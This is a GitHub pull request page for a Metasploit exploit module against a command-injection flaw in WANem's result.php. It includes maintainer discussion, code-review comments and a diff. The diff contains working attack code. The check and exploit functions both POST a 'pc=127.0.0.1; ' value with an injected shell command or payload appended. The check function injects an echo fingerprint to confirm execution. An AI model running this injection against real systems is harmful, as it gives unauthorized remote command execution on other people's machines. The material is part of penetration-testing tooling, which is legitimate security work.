check function test vulnerability + minor improvements #774

Merged
merged 1 commit into from

3 participants

@jvazquez-r7
  • Check function now tests the vulnerability by injecting an "echo" and looking at the response.
  • Minor fixes like using Rex::Text.uri_encode
  • I've asked for OSVDB numbers; we can wait to merge until OSVDB numbers are available.
@bcoles

All good improvements. Works for me.

You're correct - Privileged => true should be false - I simply misunderstood the purpose of this property.

I didn't include an echo in the check on the flimsy pretense of legality, i.e., 127.0.0.1 is "legitimate use", whereas 127.0.0.1; echo anything is arguably "unauthorized use". In hindsight this was unnecessary reasoning.

@wchen-r7

I generally favor explicit checks, but I also understand bcoles' concern. If you want, please feel free to submit another pull request to update the module again to see which one suits best. Weekly release cuts today, so I'll push this in framework for now -- looks acceptable.

@wchen-r7 wchen-r7 merged commit 37c7f36 into rapid7:master
Commits on Sep 8, 2012
  1. check function test vulnerability + minor improvements

    jvazquez-r7 committed
Showing with 21 additions and 11 deletions.
  1. +21 −11 modules/exploits/linux/http/wanem_exec.rb
32 modules/exploits/linux/http/wanem_exec.rb
@@ -25,7 +25,6 @@ def initialize(info = {})
and vulnerable to command execution in argument one.
},
'License' => MSF_LICENSE,
- 'Version' => '$Revision: 1 $',
'Privileged' => true,
'Platform' => 'unix',
'Arch' => ARCH_CMD,
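Review bot: 'Privileged' => true is left unchanged in this hunk even though the discussion in this PR agrees it should be false; since the change already touches the adjacent 'Version' line, flipping it to 'Privileged' => false here would avoid a follow-up pull request.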
@@ -42,7 +41,7 @@ def initialize(info = {})
'Payload' =>
{
'Space' => 1024,
- 'BadChars' => "\x00",
+ 'BadChars' => "\x00\x22\x27",
'DisableNops' => true,
'Compat' =>
{
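Review bot: the new \x22 and \x27 entries in 'BadChars' come without any explanation in the commit message or PR description; a short inline comment stating why quote characters must be excluded from the command payload that is placed into the pc parameter of result.php would help a future maintainer understand the constraint.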
@@ -68,24 +67,35 @@ def on_new_session(client)
end
def check
+ @peer = "#{rhost}:#{rport}"
+ fingerprint = Rex::Text.rand_text_alphanumeric(rand(8)+4)
+ data = "pc=127.0.0.1; "
+ data << Rex::Text.uri_encode("echo #{fingerprint}")
+ data << "%26"
+ print_status("#{@peer} - Sending check")
- res = send_request_cgi({
- 'method' => 'GET',
- 'uri' => '/WANem/result.php'
- })
- if res and res.body =~ /<br><br><br><b><font color=red>Can't measure\!\! Please repeat\.<\/font><\/b><\/body>/
- return Exploit::CheckCode::Appears
+ begin
+ res = send_request_cgi({
+ 'uri' => '/WANem/result.php',
+ 'method' => 'POST',
+ 'data' => data
+ }, 25)
+ rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
+ print_error("#{@peer} - Connection failed")
+ return Exploit::CheckCode::Unknown
+ end
+
+ if res and res.code == 200 and res.body =~ /#{fingerprint}/
+ return Exploit::CheckCode::Vulnerable
else
return Exploit::CheckCode::Safe
end
-
end
def exploit
-
@peer = "#{rhost}:#{rport}"
data = "pc=127.0.0.1; "
- data << URI.encode(payload.raw)
+ data << Rex::Text.uri_encode(payload.raw)
data << "%26"
print_status("#{@peer} - Sending payload (#{payload.raw.length} bytes)")
begin
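Review bot: the else branch of check returns Exploit::CheckCode::Safe whenever the if fails, which includes res being nil (send_request_cgi returning nothing within the 25-second timeout) or a non-200 status; those outcomes are inconclusive, so split them out and return Exploit::CheckCode::Unknown, reserving Safe for a 200 response whose body lacks the fingerprint. Since the fingerprint is alphanumeric, res.body.include?(fingerprint) is also simpler than building a regex from it, and a page that merely reflects the submitted pc value back would contain "echo #{fingerprint}" as well, so requiring the fingerprint to appear without the preceding "echo " would reduce false positives.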